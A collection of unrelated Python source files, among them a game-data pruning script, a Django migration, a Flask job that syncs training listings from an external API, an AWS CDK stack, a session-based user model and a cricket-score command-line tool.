toRmv.append(fnum)
[itemdata[ITM].pop(itm_fnum) for itm_fnum in toRmv]
return itemdata[ITM]
def pruneChars():
try:
with open(CHAR_LOC, "r") as charfile:
chardata = (json.loads(charfile.read()))
except Exception:
return IOError("Failed to read file.")
[chardata.pop(char) for char in list(chardata.keys()) if chardata[char][RARE] < 3 or char.startswith("token_")]
for charnum in chardata.keys():
[chardata[charnum].pop(datarow) for datarow in CHAR_REMOVE]
return chardata
def itemmapper(itemdata, formulas):
namedict = {}
for inum in itemdata.keys():
if len(itemdata[inum][FMLINK]) == 0:
itemdata[inum][COST] = []
itemdata[inum].pop(FMLINK)
else:
itemdata[inum][COST] = formulas[CONVRM[itemdata[inum][FMLINK][0][RM]]][itemdata[inum][FMLINK][0][FMID]][COST]
itemdata[inum].pop(FMLINK)
namedict[itemdata[inum][NM]] = inum
return itemdata, namedict
def main(write = False):
itemdata, namedict = itemmapper(pruneItems(), pruneFormulas())
if write:
with open('chardata.json', 'w', encoding='utf-8') as charw:
json.dump(pruneChars(), charw, ensure_ascii=False, indent=4)
with open('formulas.json', 'w', encoding='utf-8') as fmw:
json.dump(itemdata, fmw, ensure_ascii=False, indent=4)
with open('itemnames.json', 'w', encoding='utf-8') as inamew:
json.dump(namedict, inamew, ensure_ascii=False, indent=4)
with open('itemids.json', 'w', encoding='utf-8') as iidw:
json.dump({itemid:itemname for itemname, itemid in namedict.items()}, iidw, ensure_ascii=False, indent=4)
else:
return [pruneChars(), itemdata, namedict]
if __name__ == '__main__':
main(True)
|
# Generated by Django 3.2 on 2021-05-17 19:10
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('django_api', '0012_auto_20210517_0801'),
]
operations = [
migrations.AddField(
model_name='user',
name='pays',
field=models.CharField(default='None', max_length=100),
),
]
|
import copy
import json
from urllib3 import ProxyManager
from urllib import request
from flask import Response
from sqlalchemy import func
from config.config import HTTP_PROXY
from decorator.log_task import log_task
class UpdateLifelongLearningServices:
def __init__(self, db):
self.db = db
@log_task
def run(self): # pylint: disable=too-many-locals
base_url = "https://api.formator.lu/search/cybersecuritytrainings/en"
if HTTP_PROXY is not None:
http = ProxyManager(HTTP_PROXY)
response = http.request('GET', base_url)
content = response.data
else:
response = request.urlopen(base_url) # nosec
content = response.read()
data = json.loads(content)
count = {
"reviewed": 0,
"created": 0,
"modified": 0,
"deactivated": 0
}
# Get the Moovijob company
entity = self.db.session.query(self.db.tables["Company"]) \
.filter(func.lower(self.db.tables["Company"].name).like("%INFPC%")) \
.all()
if len(entity) == 0:
return [], "500 INFPC entity not found"
if len(entity) > 1:
return [], "500 Too many INFPC entity found"
entity = entity[0]
# Get the 'Training' taxonomy value
training_tags = self.db.session.query(self.db.tables["TaxonomyValue"]) \
.filter(func.lower(self.db.tables["TaxonomyValue"].name).like("Training")) \
.filter(func.lower(self.db.tables["TaxonomyValue"].category).like("SERVICE CATEGORY")) \
.all()
if len(training_tags) == 0:
return [], "500 'TRAINING' value in the 'SERVICE CATEGORY' taxonomy not found"
training_tag = training_tags[0]
# Treat the data
external_references = [a["id"] for a in data["trainings"]]
db_services = self.db.get(
self.db.tables["Article"],
{"external_reference": external_references}
)
for source_service in data["trainings"]:
db_article = [a for a in db_services if str(source_service["id"]) == a.external_reference]
db_article = db_article[0] if len(db_article) > 0 else self.db.tables["Article"]()
count["reviewed"] += 1
count["created"] += 1 if db_article.id is None else 0
db_article, m1 = self._manage_service(db_article, source_service, entity, training_tag)
count["modified"] += 1 if (db_article.id is not None and m1) else 0
# Deactivate the missing services
self._deactivate_deprecated_services(entity, external_references)
# Send response
status = f"200 Success: {count['reviewed']} treated, {count['created']} created, " \
f"{count['modified']} modified, {count['deactivated']} deactivated"
return Response(status=status)
def _manage_service(self, a, source, entity, training_tag):
copied_a = copy.deepcopy(a)
handle = f"{source['id']}"
# Insert data into Article object
a.external_reference = source["id"] if a.external_reference is None else a.external_reference
a.title = source['title'] if a.title is None else a.title
a.description = UpdateLifelongLearningServices._get_description(source) if a.title is None else a.title
a.handle = handle if a.handle is None else a.handle
a.type = "SERVICE" if a.type is None else a.type
a.status = "PUBLIC" if a.status is None else a.status
a.link = source["link"] if a.link is None else a.link
a.is_created_by_admin = True
# Save modifications in DB
article = self.db.merge(a, self.db.tables["Article"])
is_modified = not self.db.are_objects_equal(a, copied_a, self.db.tables["Article"])
# Add the Moovijob relationship if it does not exist
tags = self.db.get(self.db.tables["ArticleCompanyTag"], {"company": entity.id, "article": article.id})
if len(tags) == 0:
self.db.insert({"company": entity.id, "article": article.id}, self.db.tables["ArticleCompanyTag"])
# Add the Training tag if it does not exist
tags = self.db.get(
self.db.tables["ArticleTaxonomyTag"],
{"taxonomy_value": training_tag.id, "article": article.id}
)
if len(tags) == 0:
self.db.insert(
{"taxonomy_value": training_tag.id, "article": article.id},
self.db.tables["ArticleTaxonomyTag"]
)
return article, is_modified
def _deactivate_deprecated_services(self, entity, external_references):
subquery = self.db.session.query(self.db.tables["ArticleCompanyTag"]) \
.with_entities(self.db.tables["ArticleCompanyTag"].article) \
.filter(self.db.tables["ArticleCompanyTag"].company == entity.id) \
.subquery()
offers_to_archive = self.db.session.query(self.db.tables["Article"]) \
.filter(self.db.tables["Article"].status == "PUBLIC") \
.filter(self.db.tables["Article"].id.in_(subquery)) \
.filter(self.db.tables["Article"].external_reference.notin_(external_references)) \
.all()
if len(offers_to_archive) > 0:
for o in offers_to_archive:
o.status = "ARCHIVE"
self.db.merge(offers_to_archive, self.db.tables["Article"])
@staticmethod
def _get_description(source):
description = ""
if source["company"] is not None and len(source["company"]) > 0:
description += f"Company: {source['company']} \u2014 "
if source["durationInHours"] is not None and len(str(source["durationInHours"])) > 0:
description += f"Duration in hours: {str(source['durationInHours'])} \u2014 "
if source["trainingLevelTitle"] is not None and len(source["trainingLevelTitle"]) > 0:
description += f"Level: {source['company']} \u2014 "
if len(description) > 0:
description = description[:-3]
return description
|
from aws_cdk import core
import aws_cdk.aws_apigateway as apigw
import aws_cdk.aws_certificatemanager as cm
import aws_cdk.aws_route53 as route53
import aws_cdk.aws_route53_targets as route53_targets
from .constructs import Api
from . import Environment
class Production(core.Stack):
def __init__(self, scope: core.Construct, construct_id: str, **kwargs) -> None:
super().__init__(scope, construct_id, **kwargs)
core.Tags.of(self).add("Project", "JuliusKrahnBlogBackend")
core.Tags.of(self).add("Environment", "Production")
api = Api(self, f"{construct_id}Api", environment=Environment.PRODUCTION)
api_domain_name = apigw.DomainName(
self,
"ApiDomainName",
domain_name="api.juliuskrahn.com",
certificate=cm.Certificate.from_certificate_arn(
self,
"blog-api-domain-name-certificate",
"arn:aws:acm:eu-central-1:473883619336:certificate/4e5cacb4-f88b-45c3-abea-ce543b125499"
),
endpoint_type=apigw.EndpointType.REGIONAL
)
api_domain_name.add_base_path_mapping(api.instance)
route53.ARecord(
self,
"ApiARecord",
record_name="api",
target=route53.RecordTarget.from_alias(route53_targets.ApiGatewayDomain(api_domain_name)),
zone=route53.HostedZone.from_lookup(self, "blog-hosted-zone", domain_name="juliuskrahn.com")
)
|
from flask import session
from flask_login import UserMixin
class User(UserMixin):
"""User model
Saves user data in Flask session
"""
def __init__(self, user_id, token, email=None, name=None):
self.id = user_id
self.token = token
self.email = email
self.name = name
user_entry = {
'id': self.id,
'token': self.token,
'email': self.email,
'name': self.name,
}
# Create session user db if not already exists
user_db = session.get('user_db')
if not user_db:
session['user_db'] = {}
# Add user to db if user ID does not yet exist
if self.id not in session['user_db']:
session['user_db'].update({self.id: user_entry})
def is_authenticated(self):
if 'user_db' not in session:
return False
# User authenticated if their ID exists in the user_db dict
return True if self.id in session['user_db'] else False
# Get user object if exists, None otherwise
@classmethod
def get(cls, user_id):
if 'user_db' in session:
if user_id in session['user_db']:
user = session['user_db'].get(user_id)
return User(user['id'], user['token'], user['email'], user['name'])
# Clear current user entry from user db
@classmethod
def clear(cls, user_id):
if 'user_db' in session:
if user_id in session['user_db']:
session['user_db'].pop(user_id)
|
import json
from time import sleep
import requests
def match():
d = {}
count = 1
template1 = "http://cricapi.com/api/cricket"
data = requests.get(template1)
js = data.json()
if js['cache']:
for i in js['data']:
d[count] = [i["unique_id"],i['description']]
count += 1
return d
def details(y):
template2 = "http://cricapi.com/api/cricketScore?unique_id="
url = template2 + str(y)
data = requests.get(url)
js = data.json()
print()
if js['cache']:
print(js['team-1'],"Vs",js['team-2'])
print(js['score'])
print(js['innings-requirement'])
print()
x = match()
print("No.of Ongoing Matches:",len(x))
sleep(2)
print()
for k,i in enumerate(x,start=1):
print(k,".",x[i][1])
sleep(0.5)
print()
while True:
try:
select = input("Enter the S.No corresponding the match: ")
if select.strip() == 'q':
break
details(x[int(select)][0])
except:
print("Invalid input!")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.